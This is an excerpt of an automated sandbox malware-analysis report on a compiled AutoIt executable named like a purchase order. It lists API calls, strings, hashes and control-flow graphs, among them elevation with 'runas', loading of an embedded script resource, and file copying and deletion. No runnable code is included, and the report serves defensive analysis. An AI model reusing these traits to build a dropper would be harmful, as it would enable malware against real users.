                                                                                          • Part of subcall function 00B66430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B63DEE,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00B66471
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00B63AA3,?), ref: 00B63E48
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C128F4,00000010), ref: 00BD1CCE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00BD1D06
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BFDAB4,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00BD1D89
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00B63AA3), ref: 00BD1D90
                                                                                          • Part of subcall function 00B63E6E: GetSysColorBrush.USER32(0000000F), ref: 00B63E79
                                                                                          • Part of subcall function 00B63E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00B63E88
                                                                                          • Part of subcall function 00B63E6E: LoadIconW.USER32(00000063), ref: 00B63E9E
                                                                                          • Part of subcall function 00B63E6E: LoadIconW.USER32(000000A4), ref: 00B63EB0
                                                                                          • Part of subcall function 00B63E6E: LoadIconW.USER32(000000A2), ref: 00B63EC2
                                                                                          • Part of subcall function 00B63E6E: RegisterClassExW.USER32(?), ref: 00B63F30
                                                                                          • Part of subcall function 00B636B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B636E6
                                                                                          • Part of subcall function 00B636B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63707
                                                                                          • Part of subcall function 00B636B8: ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B6371B
                                                                                          • Part of subcall function 00B636B8: ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B63724
                                                                                          • Part of subcall function 00B64FFC: _memset.LIBCMT ref: 00B65022
                                                                                          • Part of subcall function 00B64FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B650CB
                                                                                        Strings
                                                                                        • runas, xrefs: 00BD1D84
                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00BD1CC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 438480954-3287110873
                                                                                        • Opcode ID: 69239acbc4d6ef3df0bdacf81f80cb8f1d2e627744fea6f3d25bba50012f3deb
                                                                                        • Instruction ID: b547a9a8023fddc0958caff7393bbc3ede8217c7d61b4e3bc2e85095f3e4bbe9
                                                                                        • Opcode Fuzzy Hash: 69239acbc4d6ef3df0bdacf81f80cb8f1d2e627744fea6f3d25bba50012f3deb
                                                                                        • Instruction Fuzzy Hash: FF51D631A04288BACF21ABB4DC41FED7BF5DF25B00F0441E5F95267192DA794A568B31

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00B7DDEC
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00BFDC38,?,?), ref: 00B7DEAC
                                                                                        • GetNativeSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF01
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B7DF0C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B7DF1F
                                                                                        • GetSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF29
                                                                                        • GetSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3851250370-0
                                                                                        • Opcode ID: 4edc08c28ecb934901ddf4ae6e23897b921504fa98a864c59d411a8f1d4f7347
                                                                                        • Instruction ID: 8c0d1f828289e17502849d8604ffed0da2acda24c20ccffa21ba767aa43983ac
                                                                                        • Opcode Fuzzy Hash: 4edc08c28ecb934901ddf4ae6e23897b921504fa98a864c59d411a8f1d4f7347
                                                                                        • Instruction Fuzzy Hash: 4E618DB180A2C4CBCF16CF6898C15E9BFF4AF39300B1989D9D8599F347D6248909CB66

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B6449E,?,?,00000000,00000001), ref: 00B6407B
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B6449E,?,?,00000000,00000001), ref: 00B64092
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB), ref: 00BD4F1A
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB), ref: 00BD4F2F
                                                                                        • LockResource.KERNEL32(00B6449E,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB,00000000), ref: 00BD4F42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: 9cf7b90bc6fe1161afec1e9119198573e0111e53107b08fb0fefaf5392d52831
                                                                                        • Instruction ID: e264ebba4fa03aca024decbc00995aa9dfb916e73c83654ba07d7ecdf3cf5172
                                                                                        • Opcode Fuzzy Hash: 9cf7b90bc6fe1161afec1e9119198573e0111e53107b08fb0fefaf5392d52831
                                                                                        • Instruction Fuzzy Hash: 77112E71200751AFE7218B66EC88F677BB9EBC5B51F14456CF6129B2A0DBB1DC448A20
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00BD2F49), ref: 00BA6CB9
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BA6CCA
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA6CDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 687793809e144c8ce9218c5bf22d244f1bfd8fe2ae411bcc9f84af891ccd3c7b
                                                                                        • Instruction ID: adfccac427a2c2e09ae4e28af24420087aee63cf0f9460e6f958c48adbda2ab8
                                                                                        • Opcode Fuzzy Hash: 687793809e144c8ce9218c5bf22d244f1bfd8fe2ae411bcc9f84af891ccd3c7b
                                                                                        • Instruction Fuzzy Hash: 75E0DF71818410AB82206738EC8D8EA37ACEE06339F10074AF872D21E0FBB0ED1096D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID: @
                                                                                        • API String ID: 3728558374-2766056989
                                                                                        • Opcode ID: 278e21b11ae6573eddfa30dd875f2974baa7cbd882d42af64d4cc3d227d3f139
                                                                                        • Instruction ID: 285d465436c9fd9a6c8319dfc7ba772e3f8e8ae0371f2e2d1c650c41ce978b0c
                                                                                        • Opcode Fuzzy Hash: 278e21b11ae6573eddfa30dd875f2974baa7cbd882d42af64d4cc3d227d3f139
                                                                                        • Instruction Fuzzy Hash: 0672AF70E042099FCB24DF58C481ABEB7F5EF48700F14C09AE929AB351EB75AE45DB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3964851224-0
                                                                                        • Opcode ID: 49e5adb69b024b5bc3c7d4952835fc65f0d1612366d2bae498cde056b937476a
                                                                                        • Instruction ID: a0e8fa7361057fb15949158474d31337158e379a2f73cf277e674e9b0f31d61c
                                                                                        • Opcode Fuzzy Hash: 49e5adb69b024b5bc3c7d4952835fc65f0d1612366d2bae498cde056b937476a
                                                                                        • Instruction Fuzzy Hash: B99268706083419FD724DF18C480B6ABBE1FF88704F14889DE9AA8B362D775ED45DB92
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6E959
                                                                                        • timeGetTime.WINMM ref: 00B6EBFA
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6ED2E
                                                                                        • TranslateMessage.USER32(?), ref: 00B6ED3F
                                                                                        • DispatchMessageW.USER32(?), ref: 00B6ED4A
                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00B6ED79
                                                                                        • DestroyWindow.USER32 ref: 00B6ED85
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B6ED9F
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00BD5270
                                                                                        • TranslateMessage.USER32(?), ref: 00BD59F7
                                                                                        • DispatchMessageW.USER32(?), ref: 00BD5A05
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BD5A19
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 2641332412-570651680
                                                                                        • Opcode ID: a0f4b0109b8adbdb3572b89d641e6bb3f622bdb2733a869ff9f1b2ce13749109
                                                                                        • Instruction ID: 397e38bddd8a11f5fa72d7381fa9f24a6c8beaf0595459d85472ae51191ad1e9
                                                                                        • Opcode Fuzzy Hash: a0f4b0109b8adbdb3572b89d641e6bb3f622bdb2733a869ff9f1b2ce13749109
                                                                                        • Instruction Fuzzy Hash: 5962B470504340DFEB24DF24C885BAAB7E4FF54304F1849AEF95A8B292DBB5D844CB52
                                                                                        APIs
                                                                                        • ___createFile.LIBCMT ref: 00B95EC3
                                                                                        • ___createFile.LIBCMT ref: 00B95F04
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B95F2D
                                                                                        • __dosmaperr.LIBCMT ref: 00B95F34
                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B95F47
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B95F6A
                                                                                        • __dosmaperr.LIBCMT ref: 00B95F73
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B95F7C
                                                                                        • __set_osfhnd.LIBCMT ref: 00B95FAC
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B96016
                                                                                        • __close_nolock.LIBCMT ref: 00B9603C
                                                                                        • __chsize_nolock.LIBCMT ref: 00B9606C
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B9607E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B96176
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B9618B
                                                                                        • __close_nolock.LIBCMT ref: 00B961EB
                                                                                          • Part of subcall function 00B8EA9C: CloseHandle.KERNEL32(00000000,00C0EEF4,00000000,?,00B96041,00C0EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B8EAEC
                                                                                          • Part of subcall function 00B8EA9C: GetLastError.KERNEL32(?,00B96041,00C0EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B8EAF6
                                                                                          • Part of subcall function 00B8EA9C: __free_osfhnd.LIBCMT ref: 00B8EB03
                                                                                          • Part of subcall function 00B8EA9C: __dosmaperr.LIBCMT ref: 00B8EB25
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B9620D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B96342
                                                                                        • ___createFile.LIBCMT ref: 00B96361
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B9636E
                                                                                        • __dosmaperr.LIBCMT ref: 00B96375
                                                                                        • __free_osfhnd.LIBCMT ref: 00B96395
                                                                                        • __invoke_watson.LIBCMT ref: 00B963C3
                                                                                        • __wsopen_helper.LIBCMT ref: 00B963DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                        • String ID: @
                                                                                        • API String ID: 3896587723-2766056989
                                                                                        • Opcode ID: 1faf906c824a9425d5655e4c74f0204758151a44335cf81999bd3869efc226f0
                                                                                        • Instruction ID: 7b48c4b3cda3e8ac207b031daccb322435c15d7cd01a8d687cb58cf51a2ddcc9
                                                                                        • Opcode Fuzzy Hash: 1faf906c824a9425d5655e4c74f0204758151a44335cf81999bd3869efc226f0
                                                                                        • Instruction Fuzzy Hash: 1922267190460A9BEF2A9F68DC85BBD7BE1EF11324F2442F9E9219B2E2C7358D40C751
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3074181302-0
                                                                                        • Opcode ID: 35a8ade7738f4a8097f707ffa563ed86f3a3d57f4f5c7cd50072d1208bc54eff
                                                                                        • Instruction ID: 48e44fe51c7474c9cb970be9182c6897f1208b727a56841905e590a53af4f384
                                                                                        • Opcode Fuzzy Hash: 35a8ade7738f4a8097f707ffa563ed86f3a3d57f4f5c7cd50072d1208bc54eff
                                                                                        • Instruction Fuzzy Hash: A732F570A04247DFDB21BF68D880BBD7BE1EF55314F2841EAE855AF2A2D7709842C761

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcscpy.LIBCMT ref: 00BAFA96
                                                                                        • _wcschr.LIBCMT ref: 00BAFAA4
                                                                                        • _wcscpy.LIBCMT ref: 00BAFABB
                                                                                        • _wcscat.LIBCMT ref: 00BAFACA
                                                                                        • _wcscat.LIBCMT ref: 00BAFAE8
                                                                                        • _wcscpy.LIBCMT ref: 00BAFB09
                                                                                        • __wsplitpath.LIBCMT ref: 00BAFBE6
                                                                                        • _wcscpy.LIBCMT ref: 00BAFC0B
                                                                                        • _wcscpy.LIBCMT ref: 00BAFC1D
                                                                                        • _wcscpy.LIBCMT ref: 00BAFC32
                                                                                        • _wcscat.LIBCMT ref: 00BAFC47
                                                                                        • _wcscat.LIBCMT ref: 00BAFC59
                                                                                        • _wcscat.LIBCMT ref: 00BAFC6E
                                                                                          • Part of subcall function 00BABFA4: _wcscmp.LIBCMT ref: 00BAC03E
                                                                                          • Part of subcall function 00BABFA4: __wsplitpath.LIBCMT ref: 00BAC083
                                                                                          • Part of subcall function 00BABFA4: _wcscpy.LIBCMT ref: 00BAC096
                                                                                          • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0A9
                                                                                          • Part of subcall function 00BABFA4: __wsplitpath.LIBCMT ref: 00BAC0CE
                                                                                          • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0E4
                                                                                          • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 2955681530-2806939583
                                                                                        • Opcode ID: bce6c7de9f92e7dc292005bde4c26b8cf3ffbd252ae78ae764624b5acfd5838f
                                                                                        • Instruction ID: 36543d71b3081a882a2cda063e31392378a3fdd637edfd151cceeace6ddd93fc
                                                                                        • Opcode Fuzzy Hash: bce6c7de9f92e7dc292005bde4c26b8cf3ffbd252ae78ae764624b5acfd5838f
                                                                                        • Instruction Fuzzy Hash: 3691B272508305AFCB20FF54C851FAAB3E8FF55310F0448A9F959972A1DB35EA48CB96

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B63F86
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00B63FB0
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B63FC1
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00B63FDE
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B63FEE
                                                                                        • LoadIconW.USER32(000000A9), ref: 00B64004
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B64013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 497e97b8044c233628e51067f367e9539b232907738a5d9d6a6fdf9e8de2f0e2
                                                                                        • Instruction ID: 97ab610db445df7822958ef78efe716a4f242b120d901e3c2fdda30600e71fbb
                                                                                        • Opcode Fuzzy Hash: 497e97b8044c233628e51067f367e9539b232907738a5d9d6a6fdf9e8de2f0e2
                                                                                        • Instruction Fuzzy Hash: CB21F7B5910348AFDB10DFA4E889BCDBBB5FB18700F04421AFA11AB6A0DBB105458F90

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1006 babfa4-bac054 call b8f8a0 call b7f4ea call b647b7 call babdb4 call b64517 call b815e3 1019 bac05a-bac061 call bac56d 1006->1019 1020 bac107-bac10e call bac56d 1006->1020 1025 bac110-bac112 1019->1025 1026 bac067-bac105 call b81dfc call b80d23 call b80cf4 call b81dfc call b80cf4 * 2 1019->1026 1020->1025 1027 bac117 1020->1027 1029 bac367-bac368 1025->1029 1028 bac11a-bac1d6 call b644ed * 8 call bac71a call b83499 1026->1028 1027->1028 1065 bac1d8-bac1da 1028->1065 1066 bac1df-bac1fa call babdf8 1028->1066 1033 bac385-bac393 call b647e2 1029->1033 1065->1029 1069 bac28c-bac298 call b835e4 1066->1069 1070 bac200-bac208 1066->1070 1077 bac29a-bac2a9 DeleteFileW 1069->1077 1078 bac2ae-bac2b2 1069->1078 1071 bac20a-bac20e 1070->1071 1072 bac210 1070->1072 1074 bac215-bac233 call b644ed 1071->1074 1072->1074 1085 bac25d-bac273 call bab791 call b82aae 1074->1085 1086 bac235-bac23b 1074->1086 1077->1029 1080 bac2b8-bac32f call bac81d call bac845 call bab965 1078->1080 1081 bac342-bac356 CopyFileW 1078->1081 1083 bac36a-bac380 DeleteFileW call bac6d9 1080->1083 1102 bac331-bac340 DeleteFileW 1080->1102 1081->1083 1084 bac358-bac365 DeleteFileW 1081->1084 1083->1033 1084->1029 1099 bac278-bac283 1085->1099 1087 bac23d-bac250 call babf2e 1086->1087 1097 bac252-bac25b 1087->1097 1097->1085 1099->1070 1101 bac289 1099->1101 1101->1069 1102->1029
                                                                                        APIs
                                                                                          • Part of subcall function 00BABDB4: __time64.LIBCMT ref: 00BABDBE
                                                                                          • Part of subcall function 00B64517: _fseek.LIBCMT ref: 00B6452F
                                                                                        • __wsplitpath.LIBCMT ref: 00BAC083
                                                                                          • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                                                        • _wcscpy.LIBCMT ref: 00BAC096
                                                                                        • _wcscat.LIBCMT ref: 00BAC0A9
                                                                                        • __wsplitpath.LIBCMT ref: 00BAC0CE
                                                                                        • _wcscat.LIBCMT ref: 00BAC0E4
                                                                                        • _wcscat.LIBCMT ref: 00BAC0F7
                                                                                        • _wcscmp.LIBCMT ref: 00BAC03E
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC65D
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC670
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BAC2A1
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BAC338
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BAC34E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BAC35F
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BAC371
                                                                                        Memory Dump Source
